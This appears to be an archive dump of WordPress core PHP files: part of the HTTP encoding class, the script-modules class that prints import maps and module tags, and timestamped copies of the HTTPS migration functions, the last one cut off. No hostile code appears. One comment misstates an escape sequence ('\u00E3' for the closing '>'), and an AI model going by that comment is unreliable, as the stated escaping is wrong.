if ( false !== $decompressed ) {
return $decompressed;
}
}
// Compressed data from java.util.zip.Deflater amongst others.
$decompressed = @gzinflate( substr( $gz_data, 2 ) );
if ( false !== $decompressed ) {
return $decompressed;
}
return false;
}
/**
* What encoding types to accept and their priority values.
*
* @since 2.8.0
*
* @param string $url
* @param array $args
* @return string Types of encoding to accept.
*/
public static function accept_encoding( $url, $args ) {
$type = array();
$compression_enabled = self::is_available();
if ( ! $args['decompress'] ) { // Decompression specifically disabled.
$compression_enabled = false;
} elseif ( $args['stream'] ) { // Disable when streaming to file.
$compression_enabled = false;
} elseif ( isset( $args['limit_response_size'] ) ) { // If only partial content is being requested, we won't be able to decompress it.
$compression_enabled = false;
}
if ( $compression_enabled ) {
if ( function_exists( 'gzinflate' ) ) {
$type[] = 'deflate;q=1.0';
}
if ( function_exists( 'gzuncompress' ) ) {
$type[] = 'compress;q=0.5';
}
if ( function_exists( 'gzdecode' ) ) {
$type[] = 'gzip;q=0.5';
}
}
/**
* Filters the allowed encoding types.
*
* @since 3.6.0
*
* @param string[] $type Array of what encoding types to accept and their priority values.
* @param string $url URL of the HTTP request.
* @param array $args HTTP request arguments.
*/
$type = apply_filters( 'wp_http_accept_encoding', $type, $url, $args );
return implode( ', ', $type );
}
/**
* What encoding the content used when it was compressed to send in the headers.
*
* @since 2.8.0
*
* @return string Content-Encoding string to send in the header.
*/
public static function content_encoding() {
return 'deflate';
}
/**
* Whether the content be decoded based on the headers.
*
* @since 2.8.0
*
* @param array|string $headers All of the available headers.
* @return bool
*/
public static function should_decode( $headers ) {
if ( is_array( $headers ) ) {
if ( array_key_exists( 'content-encoding', $headers ) && ! empty( $headers['content-encoding'] ) ) {
return true;
}
} elseif ( is_string( $headers ) ) {
return ( stripos( $headers, 'content-encoding:' ) !== false );
}
return false;
}
/**
* Whether decompression and compression are supported by the PHP version.
*
* Each function is tested instead of checking for the zlib extension, to
* ensure that the functions all exist in the PHP version and aren't
* disabled.
*
* @since 2.8.0
*
* @return bool
*/
public static function is_available() {
return ( function_exists( 'gzuncompress' ) || function_exists( 'gzdeflate' ) || function_exists( 'gzinflate' ) );
}
}
class-wp-script-modules.php 0000666 00000100225 15224151220 0011754 0 ustar 00 <?php
/**
* Script Modules API: WP_Script_Modules class.
*
* Native support for ES Modules and Import Maps.
*
* @package WordPress
* @subpackage Script Modules
*/
/**
* Core class used to register script modules.
*
* @since 6.5.0
*/
class WP_Script_Modules {
/**
* Holds the registered script modules, keyed by script module identifier.
*
* @since 6.5.0
* @var array<string, array<string, mixed>>
*/
private $registered = array();
/**
* An array of IDs for queued script modules.
*
* @since 6.9.0
* @var string[]
*/
private $queue = array();
/**
* Holds the script module identifiers that have been printed.
*
* @since 6.9.0
* @var string[]
*/
private $done = array();
/**
* Tracks whether the @wordpress/a11y script module is available.
*
* Some additional HTML is required on the page for the module to work. Track
* whether it's available to print at the appropriate time.
*
* @since 6.7.0
* @var bool
*/
private $a11y_available = false;
/**
* Holds a mapping of dependents (as IDs) for a given script ID.
* Used to optimize recursive dependency tree checks.
*
* @since 6.9.0
* @var array<string, string[]>
*/
private $dependents_map = array();
/**
* Holds the valid values for fetchpriority.
*
* @since 6.9.0
* @var string[]
*/
private $priorities = array(
'low',
'auto',
'high',
);
/**
* List of IDs for script modules encountered which have missing dependencies.
*
* An ID is added to this list when it is discovered to have missing dependencies. At this time, a warning is
* emitted with {@see _doing_it_wrong()}. The ID is then added to this list, so that duplicate warnings don't occur.
*
* @since 6.9.1
* @var string[]
*/
private $modules_with_missing_dependencies = array();
/**
* Registers the script module if no script module with that script module
* identifier has already been registered.
*
* @since 6.5.0
* @since 6.9.0 Added the $args parameter.
*
* @param string $id The identifier of the script module. Should be unique. It will be used in the
* final import map.
* @param string $src Optional. Full URL of the script module, or path of the script module relative
* to the WordPress root directory. If it is provided and the script module has
* not been registered yet, it will be registered.
* @param array $deps {
* Optional. List of dependencies.
*
* @type string|array ...$0 {
* An array of script module identifiers of the dependencies of this script
* module. The dependencies can be strings or arrays. If they are arrays,
* they need an `id` key with the script module identifier, and can contain
* an `import` key with either `static` or `dynamic`. By default,
* dependencies that don't contain an `import` key are considered static.
*
* @type string $id The script module identifier.
* @type string $import Optional. Import type. May be either `static` or
* `dynamic`. Defaults to `static`.
* }
* }
* @param string|false|null $version Optional. String specifying the script module version number. Defaults to false.
* It is added to the URL as a query string for cache busting purposes. If $version
* is set to false, the version number is the currently installed WordPress version.
* If $version is set to null, no version is added.
* @param array $args {
* Optional. An array of additional args. Default empty array.
*
* @type bool $in_footer Whether to print the script module in the footer. Only relevant to block themes. Default 'false'. Optional.
* @type 'auto'|'low'|'high' $fetchpriority Fetch priority. Default 'auto'. Optional.
* }
*/
public function register( string $id, string $src, array $deps = array(), $version = false, array $args = array() ) {
if ( '' === $id ) {
_doing_it_wrong( __METHOD__, __( 'Non-empty string required for id.' ), '6.9.0' );
return;
}
if ( ! isset( $this->registered[ $id ] ) ) {
$dependencies = array();
foreach ( $deps as $dependency ) {
if ( is_array( $dependency ) ) {
if ( ! isset( $dependency['id'] ) || ! is_string( $dependency['id'] ) ) {
_doing_it_wrong( __METHOD__, __( 'Missing required id key in entry among dependencies array.' ), '6.5.0' );
continue;
}
$dependencies[] = array(
'id' => $dependency['id'],
'import' => isset( $dependency['import'] ) && 'dynamic' === $dependency['import'] ? 'dynamic' : 'static',
);
} elseif ( is_string( $dependency ) ) {
$dependencies[] = array(
'id' => $dependency,
'import' => 'static',
);
} else {
_doing_it_wrong( __METHOD__, __( 'Entries in dependencies array must be either strings or arrays with an id key.' ), '6.5.0' );
}
}
$in_footer = isset( $args['in_footer'] ) && (bool) $args['in_footer'];
$fetchpriority = 'auto';
if ( isset( $args['fetchpriority'] ) ) {
if ( $this->is_valid_fetchpriority( $args['fetchpriority'] ) ) {
$fetchpriority = $args['fetchpriority'];
} else {
_doing_it_wrong(
__METHOD__,
sprintf(
/* translators: 1: $fetchpriority, 2: $id */
__( 'Invalid fetchpriority `%1$s` defined for `%2$s` during script registration.' ),
is_string( $args['fetchpriority'] ) ? $args['fetchpriority'] : gettype( $args['fetchpriority'] ),
$id
),
'6.9.0'
);
}
}
$this->registered[ $id ] = array(
'src' => $src,
'version' => $version,
'dependencies' => $dependencies,
'in_footer' => $in_footer,
'fetchpriority' => $fetchpriority,
);
}
}
/**
* Gets IDs for queued script modules.
*
* @since 6.9.0
*
* @return string[] Script module IDs.
*/
public function get_queue(): array {
return $this->queue;
}
/**
* Checks if the provided fetchpriority is valid.
*
* @since 6.9.0
*
* @param string|mixed $priority Fetch priority.
* @return bool Whether valid fetchpriority.
*/
private function is_valid_fetchpriority( $priority ): bool {
return in_array( $priority, $this->priorities, true );
}
/**
* Sets the fetch priority for a script module.
*
* @since 6.9.0
*
* @param string $id Script module identifier.
* @param 'auto'|'low'|'high' $priority Fetch priority for the script module.
* @return bool Whether setting the fetchpriority was successful.
*/
public function set_fetchpriority( string $id, string $priority ): bool {
if ( ! isset( $this->registered[ $id ] ) ) {
return false;
}
if ( '' === $priority ) {
$priority = 'auto';
}
if ( ! $this->is_valid_fetchpriority( $priority ) ) {
_doing_it_wrong(
__METHOD__,
/* translators: %s: Invalid fetchpriority. */
sprintf( __( 'Invalid fetchpriority: %s' ), $priority ),
'6.9.0'
);
return false;
}
$this->registered[ $id ]['fetchpriority'] = $priority;
return true;
}
/**
* Sets whether a script module should be printed in the footer.
*
* This is only relevant in block themes.
*
* @since 6.9.0
*
* @param string $id Script module identifier.
* @param bool $in_footer Whether to print in the footer.
* @return bool Whether setting the printing location was successful.
*/
public function set_in_footer( string $id, bool $in_footer ): bool {
if ( ! isset( $this->registered[ $id ] ) ) {
return false;
}
$this->registered[ $id ]['in_footer'] = $in_footer;
return true;
}
/**
* Marks the script module to be enqueued in the page.
*
* If a src is provided and the script module has not been registered yet, it
* will be registered.
*
* @since 6.5.0
* @since 6.9.0 Added the $args parameter.
*
* @param string $id The identifier of the script module. Should be unique. It will be used in the
* final import map.
* @param string $src Optional. Full URL of the script module, or path of the script module relative
* to the WordPress root directory. If it is provided and the script module has
* not been registered yet, it will be registered.
* @param array $deps {
* Optional. List of dependencies.
*
* @type string|array ...$0 {
* An array of script module identifiers of the dependencies of this script
* module. The dependencies can be strings or arrays. If they are arrays,
* they need an `id` key with the script module identifier, and can contain
* an `import` key with either `static` or `dynamic`. By default,
* dependencies that don't contain an `import` key are considered static.
*
* @type string $id The script module identifier.
* @type string $import Optional. Import type. May be either `static` or
* `dynamic`. Defaults to `static`.
* }
* }
* @param string|false|null $version Optional. String specifying the script module version number. Defaults to false.
* It is added to the URL as a query string for cache busting purposes. If $version
* is set to false, the version number is the currently installed WordPress version.
* If $version is set to null, no version is added.
* @param array $args {
* Optional. An array of additional args. Default empty array.
*
* @type bool $in_footer Whether to print the script module in the footer. Only relevant to block themes. Default 'false'. Optional.
* @type 'auto'|'low'|'high' $fetchpriority Fetch priority. Default 'auto'. Optional.
* }
*/
public function enqueue( string $id, string $src = '', array $deps = array(), $version = false, array $args = array() ) {
if ( '' === $id ) {
_doing_it_wrong( __METHOD__, __( 'Non-empty string required for id.' ), '6.9.0' );
return;
}
if ( ! in_array( $id, $this->queue, true ) ) {
$this->queue[] = $id;
}
if ( ! isset( $this->registered[ $id ] ) && $src ) {
$this->register( $id, $src, $deps, $version, $args );
}
}
/**
* Unmarks the script module so it will no longer be enqueued in the page.
*
* @since 6.5.0
*
* @param string $id The identifier of the script module.
*/
public function dequeue( string $id ) {
$this->queue = array_values( array_diff( $this->queue, array( $id ) ) );
}
/**
* Removes a registered script module.
*
* @since 6.5.0
*
* @param string $id The identifier of the script module.
*/
public function deregister( string $id ) {
$this->dequeue( $id );
unset( $this->registered[ $id ] );
}
/**
* Adds the hooks to print the import map, enqueued script modules and script
* module preloads.
*
* In classic themes, the script modules used by the blocks are not yet known
* when the `wp_head` actions is fired, so it needs to print everything in the
* footer.
*
* @since 6.5.0
*/
public function add_hooks() {
$is_block_theme = wp_is_block_theme();
$position = $is_block_theme ? 'wp_head' : 'wp_footer';
add_action( $position, array( $this, 'print_import_map' ) );
if ( $is_block_theme ) {
/*
* Modules can only be printed in the head for block themes because only with
* block themes will import map be fully populated by modules discovered by
* rendering the block template. In classic themes, modules are enqueued during
* template rendering, thus the import map must be printed in the footer,
* followed by all enqueued modules.
*/
add_action( 'wp_head', array( $this, 'print_head_enqueued_script_modules' ) );
}
add_action( 'wp_footer', array( $this, 'print_enqueued_script_modules' ) );
add_action( $position, array( $this, 'print_script_module_preloads' ) );
add_action( 'admin_print_footer_scripts', array( $this, 'print_import_map' ) );
add_action( 'admin_print_footer_scripts', array( $this, 'print_enqueued_script_modules' ) );
add_action( 'admin_print_footer_scripts', array( $this, 'print_script_module_preloads' ) );
add_action( 'wp_footer', array( $this, 'print_script_module_data' ) );
add_action( 'admin_print_footer_scripts', array( $this, 'print_script_module_data' ) );
add_action( 'wp_footer', array( $this, 'print_a11y_script_module_html' ), 20 );
add_action( 'admin_print_footer_scripts', array( $this, 'print_a11y_script_module_html' ), 20 );
}
/**
* Gets the highest fetch priority for the provided script IDs.
*
* @since 6.9.0
*
* @param string[] $ids Script module IDs.
* @return 'auto'|'low'|'high' Highest fetch priority for the provided script module IDs.
*/
private function get_highest_fetchpriority( array $ids ): string {
static $high_priority_index = null;
if ( null === $high_priority_index ) {
$high_priority_index = count( $this->priorities ) - 1;
}
$highest_priority_index = 0;
foreach ( $ids as $id ) {
if ( isset( $this->registered[ $id ] ) ) {
$highest_priority_index = (int) max(
$highest_priority_index,
(int) array_search( $this->registered[ $id ]['fetchpriority'], $this->priorities, true )
);
if ( $high_priority_index === $highest_priority_index ) {
break;
}
}
}
return $this->priorities[ $highest_priority_index ];
}
/**
* Prints the enqueued script modules in head.
*
* This is only used in block themes.
*
* @since 6.9.0
*/
public function print_head_enqueued_script_modules() {
foreach ( $this->get_sorted_dependencies( $this->queue ) as $id ) {
if (
isset( $this->registered[ $id ] ) &&
! $this->registered[ $id ]['in_footer']
) {
// If any dependency is set to be printed in footer, skip printing this module in head.
$dependencies = array_keys( $this->get_dependencies( array( $id ) ) );
foreach ( $dependencies as $dependency_id ) {
if (
in_array( $dependency_id, $this->queue, true ) &&
isset( $this->registered[ $dependency_id ] ) &&
$this->registered[ $dependency_id ]['in_footer']
) {
continue 2;
}
}
$this->print_script_module( $id );
}
}
}
/**
* Prints the enqueued script modules in footer.
*
* @since 6.5.0
*/
public function print_enqueued_script_modules() {
foreach ( $this->get_sorted_dependencies( $this->queue ) as $id ) {
$this->print_script_module( $id );
}
}
/**
* Prints the enqueued script module using script tags with type="module"
* attributes.
*
* @since 6.9.0
*
* @param string $id The script module identifier.
*/
private function print_script_module( string $id ) {
if ( in_array( $id, $this->done, true ) || ! in_array( $id, $this->queue, true ) ) {
return;
}
$this->done[] = $id;
$src = $this->get_src( $id );
if ( '' === $src ) {
return;
}
$attributes = array(
'type' => 'module',
'src' => $src,
'id' => $id . '-js-module',
);
$script_module = $this->registered[ $id ];
$queued_dependents = array_intersect( $this->queue, $this->get_recursive_dependents( $id ) );
$fetchpriority = $this->get_highest_fetchpriority( array_merge( array( $id ), $queued_dependents ) );
if ( 'auto' !== $fetchpriority ) {
$attributes['fetchpriority'] = $fetchpriority;
}
if ( $fetchpriority !== $script_module['fetchpriority'] ) {
$attributes['data-wp-fetchpriority'] = $script_module['fetchpriority'];
}
wp_print_script_tag( $attributes );
}
/**
* Prints the static dependencies of the enqueued script modules using
* link tags with rel="modulepreload" attributes.
*
* If a script module is marked for enqueue, it will not be preloaded.
*
* @since 6.5.0
*/
public function print_script_module_preloads() {
$dependency_ids = $this->get_sorted_dependencies( $this->queue, array( 'static' ) );
foreach ( $dependency_ids as $id ) {
// Don't preload if it's marked for enqueue.
if ( in_array( $id, $this->queue, true ) ) {
continue;
}
$src = $this->get_src( $id );
if ( '' === $src ) {
continue;
}
$enqueued_dependents = array_intersect( $this->get_recursive_dependents( $id ), $this->queue );
$highest_fetchpriority = $this->get_highest_fetchpriority( $enqueued_dependents );
printf(
'<link rel="modulepreload" href="%s" id="%s"',
esc_url( $src ),
esc_attr( $id . '-js-modulepreload' )
);
if ( 'auto' !== $highest_fetchpriority ) {
printf( ' fetchpriority="%s"', esc_attr( $highest_fetchpriority ) );
}
if ( $highest_fetchpriority !== $this->registered[ $id ]['fetchpriority'] && 'auto' !== $this->registered[ $id ]['fetchpriority'] ) {
printf( ' data-wp-fetchpriority="%s"', esc_attr( $this->registered[ $id ]['fetchpriority'] ) );
}
echo ">\n";
}
}
/**
* Prints the import map using a script tag with a type="importmap" attribute.
*
* @since 6.5.0
*/
public function print_import_map() {
$import_map = $this->get_import_map();
if ( ! empty( $import_map['imports'] ) ) {
wp_print_inline_script_tag(
(string) wp_json_encode( $import_map, JSON_HEX_TAG | JSON_UNESCAPED_SLASHES ),
array(
'type' => 'importmap',
'id' => 'wp-importmap',
)
);
}
}
/**
* Returns the import map array.
*
* @since 6.5.0
*
* @return array Array with an `imports` key mapping to an array of script module identifiers and their respective
* URLs, including the version query.
*/
private function get_import_map(): array {
$imports = array();
foreach ( array_keys( $this->get_dependencies( $this->queue ) ) as $id ) {
$src = $this->get_src( $id );
if ( '' !== $src ) {
$imports[ $id ] = $src;
}
}
return array( 'imports' => $imports );
}
/**
* Retrieves the list of script modules marked for enqueue.
*
* Even though this is a private method and is unused in core, there are ecosystem plugins accessing it via the
* Reflection API. The ecosystem should rather use {@see self::get_queue()}.
*
* @since 6.5.0
*
* @return array<string, array> Script modules marked for enqueue, keyed by script module identifier.
*/
private function get_marked_for_enqueue(): array {
return wp_array_slice_assoc(
$this->registered,
$this->queue
);
}
/**
* Retrieves all the dependencies for the given script module identifiers, filtered by import types.
*
* It will consolidate an array containing a set of unique dependencies based
* on the requested import types: 'static', 'dynamic', or both. This method is
* recursive and also retrieves dependencies of the dependencies.
*
* @since 6.5.0
*
* @param string[] $ids The identifiers of the script modules for which to gather dependencies.
* @param string[] $import_types Optional. Import types of dependencies to retrieve: 'static', 'dynamic', or both.
* Default is both.
* @return array<string, array> List of dependencies, keyed by script module identifier.
*/
private function get_dependencies( array $ids, array $import_types = array( 'static', 'dynamic' ) ): array {
$all_dependencies = array();
$id_queue = $ids;
while ( ! empty( $id_queue ) ) {
$id = array_shift( $id_queue );
if ( ! isset( $this->registered[ $id ] ) ) {
continue;
}
foreach ( $this->registered[ $id ]['dependencies'] as $dependency ) {
if (
! isset( $all_dependencies[ $dependency['id'] ] ) &&
in_array( $dependency['import'], $import_types, true ) &&
isset( $this->registered[ $dependency['id'] ] )
) {
$all_dependencies[ $dependency['id'] ] = $this->registered[ $dependency['id'] ];
// Add this dependency to the list to get dependencies for.
$id_queue[] = $dependency['id'];
}
}
}
return $all_dependencies;
}
/**
* Gets all dependents of a script module.
*
* This is not recursive.
*
* @since 6.9.0
*
* @see WP_Scripts::get_dependents()
*
* @param string $id The script ID.
* @return string[] Script module IDs.
*/
private function get_dependents( string $id ): array {
// Check if dependents map for the handle in question is present. If so, use it.
if ( isset( $this->dependents_map[ $id ] ) ) {
return $this->dependents_map[ $id ];
}
$dependents = array();
// Iterate over all registered scripts, finding dependents of the script passed to this method.
foreach ( $this->registered as $registered_id => $args ) {
if ( in_array( $id, wp_list_pluck( $args['dependencies'], 'id' ), true ) ) {
$dependents[] = $registered_id;
}
}
// Add the module's dependents to the map to ease future lookups.
$this->dependents_map[ $id ] = $dependents;
return $dependents;
}
/**
* Gets all recursive dependents of a script module.
*
* @since 6.9.0
*
* @see WP_Scripts::get_dependents()
*
* @param string $id The script ID.
* @return string[] Script module IDs.
*/
private function get_recursive_dependents( string $id ): array {
$dependents = array();
$id_queue = array( $id );
$processed = array();
while ( ! empty( $id_queue ) ) {
$current_id = array_shift( $id_queue );
// Skip unregistered or already-processed script modules.
if ( ! isset( $this->registered[ $current_id ] ) || isset( $processed[ $current_id ] ) ) {
continue;
}
// Mark as processed to guard against infinite loops from circular dependencies.
$processed[ $current_id ] = true;
// Find the direct dependents of the current script.
foreach ( $this->get_dependents( $current_id ) as $dependent_id ) {
// Only add the dependent if we haven't found it before.
if ( ! isset( $dependents[ $dependent_id ] ) ) {
$dependents[ $dependent_id ] = true;
// Add dependency to the queue.
$id_queue[] = $dependent_id;
}
}
}
return array_keys( $dependents );
}
/**
* Sorts the given script module identifiers based on their dependencies.
*
* It will return a list of script module identifiers sorted in the order
* they should be printed, so that dependencies are printed before the script
* modules that depend on them.
*
* @since 6.9.0
*
* @param string[] $ids The identifiers of the script modules to sort.
* @param string[] $import_types Optional. Import types of dependencies to retrieve: 'static', 'dynamic', or both.
* Default is both.
* @return string[] Sorted list of script module identifiers.
*/
private function get_sorted_dependencies( array $ids, array $import_types = array( 'static', 'dynamic' ) ): array {
$sorted = array();
foreach ( $ids as $id ) {
$this->sort_item_dependencies( $id, $import_types, $sorted );
}
return array_unique( $sorted );
}
/**
* Recursively sorts the dependencies for a single script module identifier.
*
* @since 6.9.0
*
* @param string $id The identifier of the script module to sort.
* @param string[] $import_types Optional. Import types of dependencies to retrieve: 'static', 'dynamic', or both.
* @param string[] &$sorted The array of sorted identifiers, passed by reference.
* @return bool True on success, false on failure (e.g., missing dependency).
*/
private function sort_item_dependencies( string $id, array $import_types, array &$sorted ): bool {
// If already processed, don't do it again.
if ( in_array( $id, $sorted, true ) ) {
return true;
}
// If the item doesn't exist, fail.
if ( ! isset( $this->registered[ $id ] ) ) {
return false;
}
$dependency_ids = array();
foreach ( $this->registered[ $id ]['dependencies'] as $dependency ) {
if ( in_array( $dependency['import'], $import_types, true ) ) {
$dependency_ids[] = $dependency['id'];
}
}
// If the item requires dependencies that do not exist, fail.
$missing_dependencies = array_diff( $dependency_ids, array_keys( $this->registered ) );
if ( count( $missing_dependencies ) > 0 ) {
if ( ! in_array( $id, $this->modules_with_missing_dependencies, true ) ) {
_doing_it_wrong(
get_class( $this ) . '::register',
sprintf(
/* translators: 1: Script module ID, 2: List of missing dependency IDs. */
__( 'The script module with the ID "%1$s" was enqueued with dependencies that are not registered: %2$s.' ),
$id,
implode( wp_get_list_item_separator(), $missing_dependencies )
),
'6.9.1'
);
$this->modules_with_missing_dependencies[] = $id;
}
return false;
}
// Recursively process dependencies.
foreach ( $dependency_ids as $dependency_id ) {
if ( ! $this->sort_item_dependencies( $dependency_id, $import_types, $sorted ) ) {
// A dependency failed to resolve, so this branch fails.
return false;
}
}
// All dependencies are sorted, so we can now add the current item.
$sorted[] = $id;
return true;
}
/**
* Gets the versioned URL for a script module src.
*
* If $version is set to false, the version number is the currently installed
* WordPress version. If $version is set to null, no version is added.
* Otherwise, the string passed in $version is used.
*
* @since 6.5.0
*
* @param string $id The script module identifier.
* @return string The script module src with a version if relevant.
*/
private function get_src( string $id ): string {
if ( ! isset( $this->registered[ $id ] ) ) {
return '';
}
$script_module = $this->registered[ $id ];
$src = $script_module['src'];
if ( '' !== $src ) {
if ( false === $script_module['version'] ) {
$src = add_query_arg( 'ver', get_bloginfo( 'version' ), $src );
} elseif ( null !== $script_module['version'] ) {
$src = add_query_arg( 'ver', $script_module['version'], $src );
}
}
/**
* Filters the script module source.
*
* @since 6.5.0
*
* @param string $src Module source URL.
* @param string $id Module identifier.
*/
$src = apply_filters( 'script_module_loader_src', $src, $id );
if ( ! is_string( $src ) ) {
$src = '';
}
return $src;
}
/**
* Print data associated with Script Modules.
*
* The data will be embedded in the page HTML and can be read by Script Modules on page load.
*
* @since 6.7.0
*
* Data can be associated with a Script Module via the
* {@see "script_module_data_{$module_id}"} filter.
*
* The data for a Script Module will be serialized as JSON in a script tag with an ID of the
* form `wp-script-module-data-{$module_id}`.
*/
public function print_script_module_data(): void {
$modules = array();
foreach ( array_unique( $this->queue ) as $id ) {
if ( '@wordpress/a11y' === $id ) {
$this->a11y_available = true;
}
$modules[ $id ] = true;
}
foreach ( array_keys( $this->get_import_map()['imports'] ) as $id ) {
if ( '@wordpress/a11y' === $id ) {
$this->a11y_available = true;
}
$modules[ $id ] = true;
}
foreach ( array_keys( $modules ) as $module_id ) {
/**
* Filters data associated with a given Script Module.
*
* Script Modules may require data that is required for initialization or is essential
* to have immediately available on page load. These are suitable use cases for
* this data.
*
* The dynamic portion of the hook name, `$module_id`, refers to the Script Module ID
* that the data is associated with.
*
* This is best suited to pass essential data that must be available to the module for
* initialization or immediately on page load. It does not replace the REST API or
* fetching data from the client.
*
* Example:
*
* add_filter(
* 'script_module_data_MyScriptModuleID',
* function ( array $data ): array {
* $data['dataForClient'] = 'ok';
* return $data;
* }
* );
*
* If the filter returns no data (an empty array), nothing will be embedded in the page.
*
* The data for a given Script Module, if provided, will be JSON serialized in a script
* tag with an ID of the form `wp-script-module-data-{$module_id}`.
*
* The data can be read on the client with a pattern like this:
*
* Example:
*
* const dataContainer = document.getElementById( 'wp-script-module-data-MyScriptModuleID' );
* let data = {};
* if ( dataContainer ) {
* try {
* data = JSON.parse( dataContainer.textContent );
* } catch {}
* }
* // data.dataForClient === 'ok';
* initMyScriptModuleWithData( data );
*
* @since 6.7.0
*
* @param array $data The data associated with the Script Module.
*/
$data = apply_filters( "script_module_data_{$module_id}", array() );
if ( is_array( $data ) && array() !== $data ) {
/*
* This data will be printed as JSON inside a script tag like this:
* <script type="application/json"></script>
*
* A script tag must be closed by a sequence beginning with `</`. It's impossible to
* close a script tag without using `<`. We ensure that `<` is escaped and `/` can
* remain unescaped, so `</script>` will be printed as `\u003C/script\u00E3`.
*
* - JSON_HEX_TAG: All < and > are converted to \u003C and \u003E.
* - JSON_UNESCAPED_SLASHES: Don't escape /.
*
* If the page will use UTF-8 encoding, it's safe to print unescaped unicode:
*
* - JSON_UNESCAPED_UNICODE: Encode multibyte Unicode characters literally (instead of as `\uXXXX`).
* - JSON_UNESCAPED_LINE_TERMINATORS: The line terminators are kept unescaped when
* JSON_UNESCAPED_UNICODE is supplied. It uses the same behaviour as it was
* before PHP 7.1 without this constant. Available as of PHP 7.1.0.
*
* The JSON specification requires encoding in UTF-8, so if the generated HTML page
* is not encoded in UTF-8 then it's not safe to include those literals. They must
* be escaped to avoid encoding issues.
*
* @see https://www.rfc-editor.org/rfc/rfc8259.html for details on encoding requirements.
* @see https://www.php.net/manual/en/json.constants.php for details on these constants.
* @see https://html.spec.whatwg.org/#script-data-state for details on script tag parsing.
*/
$json_encode_flags = JSON_HEX_TAG | JSON_UNESCAPED_SLASHES | JSON_UNESCAPED_UNICODE | JSON_UNESCAPED_LINE_TERMINATORS;
if ( ! is_utf8_charset() ) {
$json_encode_flags = JSON_HEX_TAG | JSON_UNESCAPED_SLASHES;
}
wp_print_inline_script_tag(
(string) wp_json_encode(
$data,
$json_encode_flags
),
array(
'type' => 'application/json',
'id' => "wp-script-module-data-{$module_id}",
)
);
}
}
}
/**
* @access private This is only intended to be called by the registered actions.
*
* @since 6.7.0
*/
public function print_a11y_script_module_html() {
if ( ! $this->a11y_available ) {
return;
}
echo '<div style="position:absolute;margin:-1px;padding:0;height:1px;width:1px;overflow:hidden;clip-path:inset(50%);border:0;word-wrap:normal !important;">'
. '<p id="a11y-speak-intro-text" class="a11y-speak-intro-text" hidden>' . esc_html__( 'Notifications' ) . '</p>'
. '<div id="a11y-speak-assertive" class="a11y-speak-region" aria-live="assertive" aria-relevant="additions text" aria-atomic="true"></div>'
. '<div id="a11y-speak-polite" class="a11y-speak-region" aria-live="polite" aria-relevant="additions text" aria-atomic="true"></div>'
. '</div>';
}
}
https-migration-20260606113520.php 0000666 00000011205 15224151220 0011762 0 ustar 00 <?php
/**
* HTTPS migration functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`, causing WordPress to
* add frontend filters to replace insecure site URLs that may be present in older database content. The
* {@see 'wp_should_replace_insecure_home_url'} filter can be used to modify that behavior.
*
* @since 5.7.0
*
* @return bool True if insecure URLs should replaced, false otherwise.
*/
function wp_should_replace_insecure_home_url() {
$should_replace_insecure_home_url = wp_is_using_https()
&& get_option( 'https_migration_required' )
// For automatic replacement, both 'home' and 'siteurl' need to not only use HTTPS, they also need to be using
// the same domain.
&& wp_parse_url( home_url(), PHP_URL_HOST ) === wp_parse_url( site_url(), PHP_URL_HOST );
/**
* Filters whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`. This filter can
* be used to disable that behavior, e.g. after having replaced URLs manually in the database.
*
* @since 5.7.0
*
* @param bool $should_replace_insecure_home_url Whether insecure HTTP URLs to the site should be replaced.
*/
return apply_filters( 'wp_should_replace_insecure_home_url', $should_replace_insecure_home_url );
}
/**
* Replaces insecure HTTP URLs to the site in the given content, if configured to do so.
*
* This function replaces all occurrences of the HTTP version of the site's URL with its HTTPS counterpart, if
* determined via {@see wp_should_replace_insecure_home_url()}.
*
* @since 5.7.0
*
* @param string $content Content to replace URLs in.
* @return string Filtered content.
*/
function wp_replace_insecure_home_url( $content ) {
if ( ! wp_should_replace_insecure_home_url() ) {
return $content;
}
$https_url = home_url( '', 'https' );
$http_url = str_replace( 'https://', 'http://', $https_url );
// Also replace potentially escaped URL.
$escaped_https_url = str_replace( '/', '\/', $https_url );
$escaped_http_url = str_replace( '/', '\/', $http_url );
return str_replace(
array(
$http_url,
$escaped_http_url,
),
array(
$https_url,
$escaped_https_url,
),
$content
);
}
/**
* Update the 'home' and 'siteurl' option to use the HTTPS variant of their URL.
*
* If this update does not result in WordPress recognizing that the site is now using HTTPS (e.g. due to constants
* overriding the URLs used), the changes will be reverted. In such a case the function will return false.
*
* @since 5.7.0
*
* @return bool True on success, false on failure.
*/
function wp_update_urls_to_https() {
// Get current URL options.
$orig_home = get_option( 'home' );
$orig_siteurl = get_option( 'siteurl' );
// Get current URL options, replacing HTTP with HTTPS.
$home = str_replace( 'http://', 'https://', $orig_home );
$siteurl = str_replace( 'http://', 'https://', $orig_siteurl );
// Update the options.
update_option( 'home', $home );
update_option( 'siteurl', $siteurl );
if ( ! wp_is_using_https() ) {
/*
* If this did not result in the site recognizing HTTPS as being used,
* revert the change and return false.
*/
update_option( 'home', $orig_home );
update_option( 'siteurl', $orig_siteurl );
return false;
}
// Otherwise the URLs were successfully changed to use HTTPS.
return true;
}
/**
* Updates the 'https_migration_required' option if needed when the given URL has been updated from HTTP to HTTPS.
*
* If this is a fresh site, a migration will not be required, so the option will be set as `false`.
*
* This is hooked into the {@see 'update_option_home'} action.
*
* @since 5.7.0
* @access private
*
* @param mixed $old_url Previous value of the URL option.
* @param mixed $new_url New value of the URL option.
*/
function wp_update_https_migration_required( $old_url, $new_url ) {
// Do nothing if WordPress is being installed.
if ( wp_installing() ) {
return;
}
// Delete/reset the option if the new URL is not the HTTPS version of the old URL.
if ( untrailingslashit( (string) $old_url ) !== str_replace( 'https://', 'http://', untrailingslashit( (string) $new_url ) ) ) {
delete_option( 'https_migration_required' );
return;
}
// If this is a fresh site, there is no content to migrate, so do not require migration.
$https_migration_required = get_option( 'fresh_site' ) ? false : true;
update_option( 'https_migration_required', $https_migration_required );
}
https-migration-20260605172803.php 0000666 00000011205 15224151220 0011772 0 ustar 00 <?php
/**
* HTTPS migration functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`, causing WordPress to
* add frontend filters to replace insecure site URLs that may be present in older database content. The
* {@see 'wp_should_replace_insecure_home_url'} filter can be used to modify that behavior.
*
* @since 5.7.0
*
* @return bool True if insecure URLs should replaced, false otherwise.
*/
